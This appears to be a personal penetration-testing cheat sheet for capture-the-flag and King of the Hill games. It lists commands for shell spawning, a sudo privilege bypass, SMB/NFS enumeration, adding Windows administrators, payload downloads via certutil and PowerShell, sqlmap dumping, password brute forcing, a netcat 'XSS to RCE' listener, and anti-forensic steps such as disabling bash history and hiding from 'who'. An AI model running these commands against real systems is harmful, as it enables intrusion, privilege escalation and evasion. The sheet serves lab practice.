# Linux ### Stablilize Shell 1. ctrl+z 2. stty raw -echo 3. fg (press enter x2) 4. export TERM=xterm , for using `clear` command ### Spawn bash * /usr/bin/script -qc /bin/bash 1&>/dev/null * python -c 'import pty;pty.spawn("/bin/bash")' * python3 -c 'import pty;pty.spawn("/bin/bash")' ### Vulnerable sudo version `sudo -u#-1 whoami` ### Execute as diffent user `sudo -u ` ### FTP Connect to ftp on the machine
`ftp user ` Download files recusively
` wget -r ftp://user:pass@/ ` ### SMB Shares #### SmbClient * `smbclient -L \\\\\\` accessing a share anonymously * `smbclient \\\\10.10.209.122\\ -U `accessing a share with an authorized user #### Smbmap * `smbmap -u -p -H ` #### Smbget * `smbget -R smb:///` ### NFS shares * `showmount -e ` This lists the nfs shares * `mount -t nfs :/ ` Mounting that share ### Cronjobs * cronjobs for specific users are stored in `/var/spool/cron/cronjobs/` * `crontab -u -e ` Check cronjobs for a specific user * `crontab -l` cronjob for the current user * `cat /etc/crontab` system wide cronjobs ### Finding Binaries * find . - perm /4000 (user id uid) * find . -perm /2000 (group id guid) ### Finding File capabilites `getcap -r / 2>/dev/null` ### Finding text in a files `grep -rnw '/path/to/somewhere/' -e 'pattern' ` ### Changing file attributes chattr + i filename `making file immutable`
chattr -i filename `making file mutable`
lschattr filename `Checking file attributes` ### Uploading Files scp file/you/want `user@ip`:/path/to/store
python -m SimpleHTTPServer [port] `By default will listen on 8000`
python3 -m http.server [port] `By default will listen on 8000`
### Downloading Files `wget http://:port/` ### Netcat to download files from target `nc -l -p [port] > file` Receive file
`nc -w 3 [ip] [port] < file `Send file
### Cracaking Zip Archive `fcrackzip -u -D -p ` ### Decrypting PGP key If you have `asc` key which can be used for PGP authentication then * john key.asc > asc_hash * john asc_hash --wordlists=path_to_wordlist #### Having pgp cli * pgp --import key.asc * pgp --decrypt file.pgp #### Having gpg cli * gpg --import key.asc * gpg --decrypt file.pgp ### killing a running job in same shell `jobs` ``` Find it's job number $ jobs [1]+ Running sleep 100 & $ kill %1 [1]+ Terminated sleep 100 ``` ### SSH Port Forwarding `ssh -L :localhost: @` ### Binary Exploits If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed
`export PATH=/:$PATH` # Windows ### Adding User net user "USER_NAME" "PASS" /add ### Changing User's password net user "USER_NAME" "NEWPASS" ### Adding User to Administrators net localgroup administrators "USER_NAME" /add ### Changing File Permissions CACLS files /e /p {USERNAME}:{PERMISSION}
Permissions:
1.R `Read`
2.W `Write`
3.C `Change`
4.F `Full Control` ### Set File bits attrib +r filename `add read only bit`
attrib -r filename `remove read only bit`
attrib +h filename `add hidden bit `
attrib -h filename `remove hidden bit` ### Show hidden file/folder dir /a `show all hidden files & folder`
dir /a:d `show only hidden folder`
dir /a:h `show only hidden files`
### Downloading Files `certutil.exe -urlcache -f http://:/ ouput.exe`
`powershell -c "wget http://:/" -outfile output.exe`
`powershell Invoke-WebRequest -Uri $ip -OutFile $filepath` ### Active Directory `powershell -ep bypass` load a powershell shell with execution policy bypassed
`. .\PowerView.ps1` import the PowerView module ## List Drives `wmic logicaldisk get caption` ## Decrypting PSCredential Object * $file = Import-Clixml -Path * $file.GetNetworkCredential().username * $file.GetNetworkCredential().password # Msfvenom ### List All Payloads msfvenom -l payloads ### List Payload Format msfvenom --list formats # Meterpreter ### Adding user for RDP run getgui -u [USER_NAME] -p [PASS] # Git ### Dumping repository `./gitdumper.sh ` ### Extracting information from repository `./extractor.sh ` # Wordpress using wpscan we can find users or do some further enumeration of wordpress version * `wpscan -e --url ` To bruteforce passwords * `wpscan --url -U user_file_path -P password_file_path` # Web ### XSS to RCE ``` Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done Victim: ``` ### SQL Map `sqlmap -r request.txt --dbms=mysql --dump` ### Wfuzz `wfuzz -c -z file,wordlist.txt --hh=0 http:////?date=FUZZ` ### API (Applicaton Programmable Interface) * Check for possibility if there is a v1 , it is likely to be vulnerable to LFI * Use wfuzz which is tool to fuzz for API end points or for parameter `wfuzz -u http://:/\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404`
Here `api-endpoint` can be for example `/api/v1/resources/books\?FUZZ\=.bash_history` "?" is before the parameter and FUZZ is telling to find a parameter and we are looking for `.bash_hitory` as an example ### Web Shell Bash `bash -c ""` # Wordlists ### Directory Bruteforcing * /usr/share/wordlists/dirb/big.txt * /usr/share/wordlists/dirb/common.txt * /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ### Gobuster * `gobuster dir -u http:/// -w ` * `gobuster dir -u http:/// -w -s "204,301,302,307,401,403"` (use status code if 200 is configured to respond on the web server to every get request) ### Feroxbuster `feroxbuster -u http:/// -w ` ### Dirsearch `python3 dirsearch.py -u http:/// -w ` ### Credential Bruteforcing * /usr/share/wordlists/rockyou.txt * /usr/share/wordlists/fasstrackt.txt * using `crackstation` * using `seclists` # Generating Worlists for directory brute force ### Cewl This spiders the given url and finding keyowrds then makes a wordlists through it's findings
`cewl.rb ` # King Of The Hill (KoTH) ### Monitoring and Closing Shell (Linux) * strace `debugging / tamper with processes` * gbd `c/c++ debugger` * script - records terminal activites * w /who `check current pts ,terminal device` * ps -t ps/pts-number `process monitoring` * script /dev/pts/pts-number `montior terminal` * cat /dev/urandom > /dev/pts/pts-number 2>/dev/null `prints arbitary text on terminal` * pkill -9 -t pts/pts-number ### Change SSH port `nano /etc/ssh/sshd_config` (change PORT 22 to any port you want also you can tinker with configuration file) `service sshd restart` (Restart SSH service to apply changes) ### Hide yourself from "w" or "who" `ssh user@ip -T` This -T will have some limiations , that you cannot run bash and some other commands but is helpful. ### Run Bash script on king.txt `while [ 1 ]; do /root/chattr -i king.txt; done &` ### Send messages to logged in users * echo "msg" > /dev/pts/pts-number `send message to specific user`
* wall msg `boradcast message to everyone`
### Closing Session (Windows) * quser * logoff id|user_name export HISTFILE=/dev/null found this it might help you out a little when doing KOTH it basically stops bash logging your commands in the ~/.bash_history file
sudo ifconfig tun0 down
sudo ip link set tun0 down
sudo ip link delete tun0
sudo systemctl restart systemd-networkd ; sudo systemctl status systemd-networkd